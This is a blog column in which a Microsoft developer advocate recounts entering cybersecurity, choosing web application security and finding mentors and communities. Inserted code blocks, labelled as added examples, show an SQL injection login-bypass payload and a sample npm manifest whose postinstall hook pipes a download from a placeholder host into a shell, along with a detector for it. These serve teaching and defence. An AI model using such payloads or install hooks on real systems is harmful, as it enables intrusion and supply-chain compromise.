Hacking is awesome! I can understand the appeal of those that are doing it for a living. The hunt for bugs and the fight to secure systems from bad guys sounds like an incredible challenge of both intellect and skill. It’s probably why I’ve been drawn into the world of cybersecurity. It’s an exciting field to be in for a professional or a hobbyist and one that I’m keen to explore more.
This is the first of many articles that will document my journey from my roots as a coder and a career as a developer advocate at Microsoft to the very personal exploration into the world of information security. The intention is to not only make sense of the overwhelming scope of the field and its varying disciplines but also offer brutally honest assessments of myself and the industry that I so much want to be a part of. Here goes everything!
When I started programming professionally (think MS-DOS), there was no World Wide Web to speak of. Things were fairly siloed, and computer networks were mainly found in large corporate environments. At least for me, worrying about an external threat actor wasn’t really a concern, because there wasn’t a lot to download and my machine wasn’t open to the world. My how things have changed. Billions of devices are now interconnected leveraging the Internet as a data transport mechanism with many of those same devices having some pretty shoddy security.
This connectivity is a blessing and a curse, offering an amazing plethora of information from all aspects of life, culture and interests while at the same time opening an avenue for everyone from the mischievous to the criminal to cause problems. As we’ve seen, this can range from something as trivial as hijacking a Twitter account to embarrass someone to taking out critical infrastructure in politically motivated attacks.
The impetus for my desire to dive deeper into information security was driven by WannaCry, the ransomware campaign that wreaked havoc worldwide. While I had of course read about previous ransomware attacks, this impacted me differently, because human lives were at risk. Hospital computers were locked out and patients, some needing urgent medical attention, were being turned away from the care they needed. This really upset me. What if it were my family affected? What if my child couldn’t get the treatment he or she desperately needed simply because some miscreant wanted to score 300 dollars in Bitcoin? Being a software developer for so many years who also had a background in networking, I felt I had the skills to better understand the security landscape and work towards helping to protect people.
Finding Your Way Around
In modern development, the single constant all programmers understand is that things are going to change all the time. The days of learning a single tool or language and running with it for a decade or two are long gone. The security industry is no different and, in many respects, more complex because of the scope of assets that need to be protected. When I first started wading into the water, it became immediately apparent that there’s no way someone could be an expert in everything. “Information security” is a very large umbrella that encompasses numerous areas like infrastructure, support, incident response, risk, compliance, policy and many others, including what many call ethical hacking. Even the hacking area of infosec is very wide and continues to expand. It’s easy to look at Elliot on Mr. Robot and think, “Oh, he knows everything about hacking, so I should be him!” The reality is that most security professionals tend to focus on specific areas, becoming subject matter experts who assist teammates at specific points in their engagements. Focus areas might include:
- Web application penetration testing
- Network penetration testing
- Open-source Intelligence (OSINT)
- Digital Forensics & Incident Response (DFIR)
- Reverse engineering (RE)
- Malware research
- Physical penetration testing
This is only a small subset of the countless roles available, but a common theme is that most people are experts in some of these but not all of these. This also means that opportunities abound for anyone wanting to get into this field, because you can choose a subject area, become really good at it and be successful.
That sounds great! So what’s the issue? All of these areas sound so darn cool to work in! I could certainly imagine how much fun it would be to do a physical pentest of a facility, working to get in undetected and poking around. Or how about developing the OSINT skills that would allow you to find information about anyone or anything using a variety of openly available resources? That’s a pretty powerful skill to have nowadays. This is the conundrum that I think many people encounter when they begin their journey into cybersecurity. Which path do I take?!
Choosing a Path – AppSec
As I spoke to experienced security pros, the common direction I kept getting pointed to was application security (AppSec), specifically web AppSec, due to my expertise in web development. The advice made a lot of sense given my understanding of how modern web apps work and of the infrastructure that powers websites.
In modern web development, there’s a strong reliance on frameworks and libraries not only to scaffold up applications but also to provide the security safeguards that protect them. To an extent, having these protections built into a framework is a good thing, but it also seems to breed complacency about understanding which common security issues need to be addressed. This is evident in the fact that the recently updated Open Web Application Security Project (OWASP) Top 10 list still ranks injection, with SQL injection as the classic case, as #1. Attackers are continuously creative, so relying solely on built-in mechanisms to protect applications will continue to be a pain point.
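To make the injection point concrete, here is an added example (my own illustration, not code from the original post or from any framework): a login query built by string concatenation next to the same query with bound parameters. The table and column names, the `?` placeholder style and the `effectiveSql` helper that mimics how a database drops a `--` comment are all assumptions for the demonstration.

```javascript
// Added example: string-built SQL versus a parameterized query.
// Sample inputs below are constructed for illustration.

// Vulnerable: user-controlled text becomes part of the SQL grammar.
function buildLoginQueryUnsafe(email, password) {
  return (
    "SELECT * FROM Users WHERE email = '" + email +
    "' AND password = '" + password + "'"
  );
}

// Safer: the SQL text is fixed and the values travel separately as bind
// parameters, so the driver never parses them as SQL. The '?' placeholder
// style is an assumption (it is what common node drivers accept).
function buildLoginQuerySafe(email, password) {
  return {
    sql: "SELECT * FROM Users WHERE email = ? AND password = ?",
    params: [email, password],
  };
}

// Simplified model of the database's parse step: everything after "--" is a
// comment and is discarded. (Real parsers also honour quoting; this helper
// ignores that, which is enough to show what the payload does here.)
function effectiveSql(sql) {
  const idx = sql.indexOf("--");
  return (idx === -1 ? sql : sql.slice(0, idx)).trim();
}

// Classic payload: the single quote closes the email literal, OR 1=1 makes the
// predicate always true, and "--" comments out the password check entirely.
const payload = "' OR 1=1--";

const unsafe = effectiveSql(buildLoginQueryUnsafe(payload, "whatever"));
// unsafe is now: SELECT * FROM Users WHERE email = '' OR 1=1
// The password predicate is gone, so every row matches.

const safe = buildLoginQuerySafe(payload, "whatever");
// safe.sql is unchanged and safe.params[0] is just a string the database
// compares against the email column; no row has that email, so login fails.

console.log(unsafe);
console.log(safe.sql, safe.params);
```

The practical check is simple: if user input ever appears inside the SQL string itself rather than in a separate parameter list, the query is injectable no matter which framework wraps it.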
Developers need to have a better understanding of potential threats and the ability to work with a “security first” mindset. Unfortunately, this is many times at odds with the business demands of a site, especially in the startup world where a “ship fast, break things” mentality is pervasive and essential to being a first mover in a specific business segment. It’s not that developers don’t want to build secure apps but more that they have intense pressure to get the code up.
Another major concern is the reliance on third-party OSS code. It’s so easily included via sources like npm that properly vetting what is being shipped becomes a challenge. It’s well known that many developers simply run “npm install <package>” without actually looking at what’s being installed, simply because the package seems to solve some unique use case. This can lead to supply-chain attacks down the line that affect not only the developer but also their end users. This is why companies such as Snyk, Veracode, Black Duck Software and WhiteHat Security are doing well with their code analysis suites and why npm acquired Lift Security to help better protect developers from malicious packages.
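As an added example of the kind of vetting that “npm install” skips (my own illustration, not code from the original post, npm or any of the vendors named above): a small audit of a dependency’s package.json that flags install-time lifecycle scripts and dependencies that bypass the registry. The manifest it inspects is constructed, and the list of hooks and the heuristics are assumptions chosen for the demonstration.

```javascript
// Added example: sanity-check a package manifest before letting npm run its
// install hooks. The sample manifest below is constructed for illustration.

// npm runs these scripts automatically during installation, so they are the
// first place to look when a package is unfamiliar (assumed list).
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Dependency specs that bypass the registry (git URLs, tarball URLs, local
// paths, GitHub shorthand) have no published version history to review.
function isNonRegistrySpec(spec) {
  return (
    /^(git\+|git:|github:|https?:|file:|ssh:)/.test(spec) ||
    /^[\w-]+\/[\w.-]+(#.*)?$/.test(spec) // user/repo shorthand
  );
}

// Heuristic for "downloads and runs something" in a lifecycle script.
function looksLikeRemoteExec(command) {
  return /\b(curl|wget)\b[^|]*\|\s*(sh|bash)\b/.test(command);
}

function auditManifest(pkg) {
  const findings = [];
  const scripts = pkg.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (typeof scripts[hook] === "string") {
      findings.push({
        kind: "lifecycle-script",
        hook,
        command: scripts[hook],
        remoteExec: looksLikeRemoteExec(scripts[hook]),
      });
    }
  }
  for (const field of ["dependencies", "optionalDependencies"]) {
    for (const [name, spec] of Object.entries(pkg[field] || {})) {
      if (isNonRegistrySpec(spec)) {
        findings.push({ kind: "non-registry-dependency", field, name, spec });
      }
    }
  }
  return findings;
}

// Constructed manifest: one suspicious postinstall hook and one git dependency.
const sampleManifest = {
  name: "tiny-helper",
  version: "1.0.0",
  scripts: {
    test: "mocha",
    postinstall: "node ./scripts/setup.js && curl -s https://example.invalid/x | sh",
  },
  dependencies: {
    express: "^4.16.0",
    helper: "git+https://example.invalid/helper.git#master",
  },
};

for (const f of auditManifest(sampleManifest)) {
  console.log(JSON.stringify(f));
}
```

Two findings come back for the sample: the postinstall hook (flagged as piping a download into a shell) and the git-sourced dependency. None of this replaces reading the code, but it turns a blind “npm install” into a deliberate decision, and `npm install --ignore-scripts` exists for the cases where you want to pull the package down without letting its hooks run at all.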
That was a long-winded way of saying that AppSec is really important and a path that feels natural for me. There’s a lot of work to be done to educate developers on common attack vectors, and it’s something I feel I can contribute to. OWASP is one of the best resources for learning about threats and mitigations, offering articles, reference material, books and tools to shore up your skills. One of the best tools I’ve found from the OWASP project is Juice Shop. Created and managed by Björn Kimminich, Juice Shop is a deliberately vulnerable web application that you can run in a virtual machine and probe to find common vulnerabilities. It’s built on Node.js, the Express framework and AngularJS, offering a modern web app architecture on which to practice both attacks and mitigation techniques. It’s one of my favorite projects, because it forces me to dive deeper into things like network requests, HTTP headers and API calls to break the app and score points, using tools like the browser’s built-in developer tools as well as proxies like Burp Suite. There are plenty of other prepackaged vulnerable web apps (Damn Vulnerable Web Application (DVWA)) and repositories (Hack.me), but, being my first, Juice Shop deserves special recognition.
It’s not to say that I don’t like other aspects of security. I REALLY love the thought of pentesting a network or gathering threat intel. AppSec is just the area that offers the lowest barrier to entry, and I see it as an on-ramp to other areas.
The Glut of Information
The wealth of learning resources on the Internet is a double-edged sword. It’s absolutely amazing that you can find a ton of articles, videos, courses and projects all relating to security. The downside is figuring out how to organize all of that information into a concise flow that allows you to ramp up in a thoughtful and methodical way, so you’re not overwhelmed. This is what happened to me initially. I became so excited about learning about security, that I started buying books and courses, looking at videos, bookmarking articles and downloading tools like Kali… all without a plan or understanding what to do with them. It just seemed like that’s what I needed to do, and I remember time passing by with me scratching my head wondering, “how do I make all of these tools work in a logical way?”. I went as far as building a “p0wn phone” using Kali Nethunter, because it looked cool and was a nice project. Was I able to get it installed and running? Yep. Was I able to do anything useful with it? Nope. While I enjoyed the challenge of getting this phone setup, it would’ve been a much more beneficial experience if I actually knew how to use the tools on the phone.
My “Ah ha!” moment came when I took an on-site, 4-day hands-on course with Matthew Hickey (@hackerfantastic), co-founder of Hacker House. It was an introduction to hacking using many of the tools included in Kali along with others provided by Matthew directly. The key thing is that it allowed me to get guidance on when to use a tool and why something worked the way it did. It also allowed me to ask questions that helped me grok why something wasn’t working the way I expected. The course gave me the foundation I needed to understand how to make use of these tools, something that I struggled with from the vast sea of generally disorganized information available online. This gave me the confidence to attack VMs like Juice Shop and see actual results.
Some people learn from books, some learn from pulling information together from a variety of resources. For me, getting a good foundation with a mentor was critical to developing an understanding of how to move forward in this complex field. Since the course, I’ve seen a slew of online offerings that are catering to people looking for a well-defined path and offering an organized learning curriculum. Companies like eLearnSecurity and SANS have developed these types of course offerings working to help students become proficient in a structured fashion.
The biggest takeaway I’ve gotten is that security is a BIG topic area, and it will take time to learn even one subject area. My recommendation is to:
- Don’t buy anything or install anything without doing your homework first
- Find a specific area and focus on understanding what a job entails
- Understand what the bare-minimum entry requirements are
- Seek a mentor who can guide you towards resources that are specifically tailored towards your interest area
- If possible, take a course that will allow you to interact with an instructor and fellow students
It’s really easy to be overwhelmed by the glut of information. If you visit YouTube and search for hacking tutorials, it’s a never-ending medium of information that may not resonate, because you don’t have the foundational skills to grok it. Take your time and investigate which area really piques your interest and then follow my advice above.
Chat Servers, Forums and Conferences
Humans generally have an innate desire to discuss their new interests. It’s the gravitational pull to find like-minded people that you can share and hang out with, because they “get” what you’re into. It’s like the joke about CrossFitters. How do you know someone does CrossFit? They never stop talking about CrossFit (note I do CrossFit)! So, it’s normal to seek out online mediums and in-person events to participate in.
For me, DEF CON was that in-person event. This was the tweet I put out about it:
I would love to go to @defcon but I’m scared shitless to go to Def Con
— Rey Bango (@reybango) March 10, 2017
And yes I was very intimidated by DEF CON, because the thought of being at an event with 13,000 hackers of different color hats left me a bit uneasy. And I don’t feel it was unfounded. DEF CON is known for having one of the most hostile networks around, and, if you go in there unprepared, you’ll get owned. Thankfully, a LOT of the community came out to support me giving me tips for having a great experience. People like Matt Torbin spent time showing me the ins and outs of what to do and how not to get in trouble. It was truly amazing and eye-opening. While you certainly wanted to be on your toes, what I discovered was the majority of attendees were really kind, open, and generous with a lot of effort going into providing an inclusive experience. What I ultimately came to find out is that events like DEF CON are as much about building new relationships as they are about the talks. So when you go to an event, it’s really important to meet people and make new friends. It truly makes events go way better, because being alone for several days at a conference truly sucks.
As for chat servers and forums, the first bit of advice I want to offer is to be careful. There are a lot of different servers out there and not all have good intentions, so it’s very important to properly manage the information you share out. I was fortunate to meet some folks early on who were really savvy in operational security (OPSEC) and helped me understand things like:
- Creating online personas
- Asking questions in ways that don’t directly identify you
- Using tools like VPNs to better anonymize myself
This allowed me to engage at a pace that was comfortable for me without getting myself into trouble. With that said, some of the brightest people I’ve met have been via Slack and Discord servers like:
The main thing to keep in mind is that there will be a lot of general banter and some trolling in these mediums, but, if you can filter out the noise, the signal is definitely worth the effort. Most folks on these mediums are simply there to share ideas and get help learning about security. Depending on how engaged you are, you can build online relationships that transfer to the real world at conferences and meetups. Many of the people I’ve met online I’ve also had the good fortune to meet in person, with some even becoming trusted friends. It’s always interesting putting a face to an alias and spending in-person time chatting. It brings a different and humanizing dimension to the relationship.
No matter what, it’s important to keep your wits about you. Not everyone has good intentions so be cautious but do engage.
What’s Next for Me?
That’s a good question. I’ve been seeing a trend in computers for a while where I feel the two biggest career growth areas are Artificial Intelligence/Machine Learning and Information Security. Having a better understanding of the latter now, I absolutely think it’s important for me to continue to learn how to build secure systems, and I see AppSec as the logical north star for me. I have a good relationship with the web and OSS community which I believe can allow me to have good conversations and get a handle on best-practices for web apps. As a developer advocate, I spend a lot of time chatting with developers, so it seems like a great opportunity to bring this topic into my exchanges, whether for a speaking engagement or just “hallwaycon” discussions. Web developers have an important but very challenging role. Building stable and secure applications is hard, and invariably people will make mistakes. If I can help minimize those mistakes, then I feel it’s the right path to take.
The one thing I do know is that I’m hooked on cybersecurity. My friend Justin (@sneakerhax) told me that I have a bad case of “security flu,” and I have to agree. While I’ll be incorporating security into my day job to an extent, I also want to continue evolving this beyond AppSec and learning more aspects of security. It’s been a fun ride so far, and I’ve no plans of getting off just yet.
So, stay tuned to this new column, where I will continue my journey into security. What I find and the experiences I have will determine the path and future topics.
Rey Bango is a developer advocate at Microsoft focused on helping developers build awesome cross-browser experiences. He’s an ardent supporter of standards-based development and open-source development. He’s taken an interest in information security, especially appsec, and wants to help build more secure experiences.